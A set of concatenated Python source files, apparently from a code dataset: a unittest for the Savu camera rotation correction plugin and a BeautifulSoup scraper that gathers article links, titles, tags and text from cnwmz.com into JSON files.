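# placeholders, presumably filled in by a driver script before running cmsRun.
# A hedged sketch of such a substitution (the concrete values and file names
# here are assumptions for illustration only):
#
#     cfg = open('write2DB_template.py').read()
#     for token, value in [('SQLITEFILE', 'sqlite_file:beamspot.db'),
#                          ('TAGNAME', 'BeamSpotObjects_test'),
#                          ('TIMETYPE', 'runnumber'),
#                          ('BEAMSPOTFILE', 'beamspot_payload.txt')]:
#         cfg = cfg.replace(token, value)
#     open('write2DB_run.py', 'w').write(cfg)
#     # then: cmsRun write2DB_run.py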
|
the-stack_0_1700 | # Copyright 2014 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module:: camera_rot_corr_test
:platform: Unix
:synopsis: Test for the camera_rot_correction plugin
.. moduleauthor:: Mark Basham <[email protected]>
"""
import unittest
from savu.test import test_utils as tu
from savu.test.travis.framework_tests.plugin_runner_test import \
run_protected_plugin_runner
class CameraRotCorrTest(unittest.TestCase):
global data_file, experiment
data_file = '24737.nxs'
experiment = None
def test_correction(self):
process_list = 'corrections/camera_rot_corr_test.nxs'
options = tu.initialise_options(data_file, experiment, process_list)
run_protected_plugin_runner(options)
tu.cleanup(options)
if __name__ == "__main__":
unittest.main()
|
the-stack_0_1701 | import requests
import re
from bs4 import BeautifulSoup
import traceback
import json
def get_html_text(url):
try:
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',
}
r = requests.get(url, headers=headers)
r.raise_for_status()
r.encoding = 'utf-8'
return r.text
except:
return 200
# traceback.print_exc()
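# NB: on any request failure get_html_text() returns the integer 200 as a
# sentinel instead of raising; callers compare against it (e.g.
# "if wu_text == 200: break" in get_news_content) to stop paging.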
def get_nav_addr(lst, web_url):
url = get_html_text(web_url + '/html/wenmimap.html')
soup = BeautifulSoup(url, "html.parser")
link_list = soup.find_all('div', attrs={'class': 'list'})
# print(link_list)
# print(link_list[0])
# print(type(link_list[0]))
    # get all of the navigation links from the sitemap
    for div in link_list:
        ul_list = div.find('ul')
# print(ul_list)
a = ul_list.find_all('a')
for i in a:
try:
href = i.attrs['href']
lst.append(href)
except:
traceback.print_exc()
def get_article_url(lst, web_url, path):
fw = open(path, 'a', encoding='utf-8')
nav_count = 0
    # get the link of every article
for nav_link in lst:
article_count = 0
print(nav_link)
max_list = 0
min_list = 0
url = get_html_text(web_url + nav_link)
soup = BeautifulSoup(url, "html.parser")
page = soup.find('h3', attrs={'class': 'list_page'})
# print(page)
        # check whether this page actually has any content
if page is None:
continue
min_page = page.find_all('a', string="首页")
max_page = page.find_all('a', string="尾页")
min_num = re.search(r'\d{1,4}', str(min_page[0]))
max_num = re.search(r'\d{1,4}', str(max_page[0]))
        # when there is only one page the link may just be /index.html, so the wanted page number is missing
if min_num:
min_num1 = int(min_num.group(0))
else:
min_num1 = 1
if max_num:
max_num1 = int(max_num.group(0))
else:
max_num1 = 1
        # take the largest page number and iterate over the articles on every page
num = int(max(min_num1, max_num1))
try:
for i in range(num):
r = get_html_text(web_url + nav_link + 'List_' + str(i + 1) + '.html')
# url = web_url + nav_link + 'List_' + str(i + 1) + '.html'
# 将"http://www.cnwmz.com/html/jiguandanwei_tag/gongqingtuan/List_27.html"等等写入文本
# fw.write(json.dumps(url, ensure_ascii=False) + '\n')
soup = BeautifulSoup(r, "html.parser")
                # grab the content of the <dt> tags directly
# article = soup.find("article", attrs={'id': 'list_l'})
article = soup.find_all('dt', soup)
for article_list in article:
a = article_list.find('a')
href = a.attrs['href']
article_url = web_url + href
# print(article_url)
article_count += 1
fw.write(json.dumps(article_url, ensure_ascii=False) + '\n')
# print(href)
# lst.append(href)
nav_count += 1
print(article_count)
except:
traceback.print_exc()
print(nav_count)
def get_news_content(lst, web_url, fpath, fcontent):
info_dict = {'url': '', 'title': '', 'content': '', 'class': '', 'tag': []}
fw = open(fcontent, 'a', encoding='utf-8')
with open(fpath, 'r') as fr:
for i, line in enumerate(fr):
# print(i)
url = re.search(r'http.+\.html', line).group(0)
print(url)
try:
r = get_html_text(url)
                # store the url in the dict
info_dict['url'] = url
soup = BeautifulSoup(r, 'html.parser')
nav = soup.find('nav')
nav_a = nav.find_all('a')
nav_con = '您现位置:'
for nav_content in nav_a:
# print(nav_content.string)
nav_con += nav_content.string + '>'
# print(nav_con + '>正文')
                # store the breadcrumb navigation in the dict
info_dict['class'] = nav_con + '>正文'
# print(nav)
article = soup.find('article', attrs={'id': 'con_l'})
# print(article)
title = article.find('h1')
# print(title.string)
                # store the title in the dict
info_dict['title'] = str(title.string)
section_tip = article.find('section', attrs={'id': 'tip'})
tip = section_tip.find('h2')
tag = tip.find_all('a')
tag_con = []
for t in tag:
tag_con.append(t.string)
                # store the tags in the dict
info_dict['tag'] = tag_con
                # start fetching the article body
                # the article may span several pages, so content from multiple pages needs to be crawled
web_url = re.search(r'http://www.cnwmz.com/html/\d+/\d+', line)
content = ''
con = ['']
for j in range(30):
                    # probe whether the article has more pages; if so, vary j and keep appending the content
if j != 0:
j += 1
wu = str(web_url.group(0)) + '_' + str(j) + '.html'
wu_text = get_html_text(wu)
if wu_text == 200:
break
soup = BeautifulSoup(wu_text, 'html.parser')
article_content = soup.find('section', attrs={'id': 'article'})
art_p = article_content.find_all('p')
print(len(art_p))
if len(art_p) < 2:
for ac in article_content:
name = str(ac.name)
if name == 'br':
content += '\n'
if str(ac.string) == 'None' or str(ac.string) == 'wm("arc");':
continue
# print(ac.string)
content += str(ac.string)
# print(content)
# con[0] = content
else:
article1 = soup.find('article', attrs={'id': 'con_l'})
art = article1.find_all('p')
# print(art)
for j, a in enumerate(art):
# if a.attrs['class'] == 'page_css':
# continue
# print(art[j])
# print(type(art[j]))
# if art[j].find('class', attrs={'class': 'page_css'}):
# print(1)
# continue
m = art[j].find('a')
if art[j].find('a'):
if str(art[j].find('a').string) == '上一页':
continue
# print(a.contents)
for m in a.contents:
content += str(m.string)
# print(m)
# print(content)
content += '\n'
# con[0] = content
# print(content)
                # store the article content in the dict
info_dict['content'] = content
fw.write(json.dumps(info_dict, ensure_ascii=False) + '\n')
except:
traceback.print_exc()
if i == 0:
break
# print(info_dict)
fr.close()
fw.close()
def main():
web_url = 'http://www.cnwmz.com'
lst = []
fpath = 'F://wmz/wmz.json'
flist_url = 'F://wmz/article_url2.txt'
fcontent = "F://wmz/article_info_test.txt"
    # get the page-number links for every navigation section of the wenmi site
# get_nav_addr(lst, web_url)
    # get all of the article links from the wenmi site
# get_article_url(lst, web_url, flist_url)
    # fetch the desired content
get_news_content(lst, web_url, flist_url, fcontent)
if __name__ == '__main__':
main()
|